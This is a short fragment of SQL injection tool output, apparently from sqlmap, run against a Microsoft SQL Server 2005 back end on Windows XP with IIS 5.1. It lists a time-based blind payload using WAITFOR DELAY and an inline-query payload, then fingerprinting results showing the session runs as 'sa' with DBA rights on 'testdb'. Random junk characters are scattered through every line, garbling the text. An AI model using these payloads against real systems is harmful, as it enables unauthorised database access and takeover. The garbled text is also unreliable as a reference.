Type: AND/OR time-based blind 2 ~* K4 V" ~) _! T- |' m( \( I Title: Microsoft SQL Server/Sybase time-based blind * f. W2 f O) R( W Payload: id=1 WAITFOR DELAY '0:0:5'--# |1 w9 N, j; ^
* W4 |& H" o, ]
Type: inline query% c; Y, U8 z* `
Title: Microsoft SQL Server/Sybase inline queries1 [6 p& k4 X E+ R6 W/ [6 X
Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)) , [. `2 ]0 U3 Q- g0 h---$ F! P' [$ i' l: b3 B- Q
web server operating system: Windows XP 1 K, p* ^2 F: q4 Iweb application technology: ASP, Microsoft IIS 5.1# p+ f" K5 _& n% x& d. X! c$ w
back-end DBMS operating system: Windows XP Service Pack 26 U9 P2 ` l" E: `/ q( `
back-end DBMS: Microsoft SQL Server 20059 d) Y2 f( ^) u! u6 ]$ y
banner:4 D, @/ `% Z" R: k' ~
--- # |3 S% I7 Q0 Q' _6 z( f2 d* SMicrosoft SQL Server 2005 - 9.00.1399.06 (Intel X86) * W; [) F$ p7 L8 l; S4 _
Oct 14 2005 00:33:37 # |$ j" ~8 r% g+ o( Y
Copyright (c) 1988-2005 Microsoft Corporation 7 Y( y7 o& l3 S Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)+ `* T8 }4 k+ O. h( ]% m
--- # d3 x5 M4 T* t5 dcurrent user: 'sa'3 D- U5 {' x1 g. H
current database: 'testdb' " h+ n( V4 |" ^9 O9 G/ L4 ocurrent user is DBA: True